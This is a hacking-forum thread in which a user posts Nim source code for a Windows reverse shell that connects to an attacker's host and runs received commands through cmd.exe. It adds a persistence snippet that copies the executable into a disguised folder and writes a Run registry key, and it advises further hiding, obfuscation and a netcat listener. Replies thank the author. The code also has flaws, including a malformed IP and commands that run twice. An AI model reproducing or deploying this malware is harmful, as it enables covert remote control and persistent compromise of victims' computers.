var unreadAlerts = '1';
You have one unread private message from dkota titled Welcome to the Forum!

Nim reverse shell w source code
#1
Hello, In this post I will be demonstrating some principles of malware construction by creating a reverse shell with source code included. The program will be written in nim. Note: this code is proof of concept use at risk.

    to start lets put some code here
Code:
import std/[net, osproc, strformat]

const shell = ">>>  "
let
    ip = "192..192.19.1"
    portt = 4343
    sock = newSocket()

  try: 
    sock.connect(ip, portt.Port)

    while true:
      send(sock, shell)
      let
        load = recvLine(sock)
        execute = execProcess(fmt"cmd.exe /C " & load)
      discard execProcess(fmt"cmd.exe /C " & load)
      send(sock, execute)
  except:
    quit(fmt"cmd.exe /C ")

    Now lets look at what this code is doing.

    Firstly we define some some variables for connecting. Those are our desired IP address, and port, we also define a variable as a newsocket. Next we connect to the attacker. Next we have a while true statement that does two things. One it sends our shell and then waits to receive a command then executes that command. Now lets get into some persistence.

Code:
import winregistry

createDir("""C:\Program logs\log history""")
copyFileToDir("reverse_shell.exe", """C:\Program logs\log history""")

var h: RegHandle
h = open("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", samWrite)
h.writeString("reverse_shell", """"C:\Program logs\log history\reverse_shell.exe"""")

    This code creates a regKey and a directory to store our program in. Though, you'll want to hide it better than this. So now we have a program that can take cmd commands from an attacker using some basic malware principles. In addition to this code you will want to take more care with obfuscation

Each import purpose is as fallows
  • net for connecting
  • osproc for executing the cmd commands
  • strformat for formating the strings we wanna execute
  • winregistry for creating registry keys
    You can use Netcats as a listener though it does not support multiple connections
UwU
Report
#2
Good tutorial, though you didn't explain the imports do.
Still good stuff, thank you for sharing
If you have any questions, please PM dkota
Reply Quote //
#3
prince97 Wrote: Good tutorial, though you didn't explain the imports do.
Still good stuff, thank you for sharing
edited thank you
UwU
Reply Quote // Report
#4
basic but lit...
thanks for this amazing tut
Reply Quote // Report


Quick Reply
Message
Type your reply to this message here.



Possibly Related Threads…
Thread Author Replies Views Last Post
[FREE CODE] [Python] [PoC] SAST Low Hanging Fruit notnotahacker 3 246 06-10-2023, 07:39 PM
Last Post: nullcat
Quick C# FUD reverse shell Xprogrammer 1 162 05-27-2023, 06:12 PM
Last Post: demoted
VB.net Code snippets for malware scarab 3 279 05-14-2023, 12:38 PM
Last Post: napster2027



Users browsing this thread: purely_cabbage
var thread_deleted = "0"; if(thread_deleted == "1") { $("#quick_reply_form, .new_reply_button, .thread_tools, .inline_rating").hide(); $("#moderator_options_selector option.option_mirage").attr("disabled","disabled"); }